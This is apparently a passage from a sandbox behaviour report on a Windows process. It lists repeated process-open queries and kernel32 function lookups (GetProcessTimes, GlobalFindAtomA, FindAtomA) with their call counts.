| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
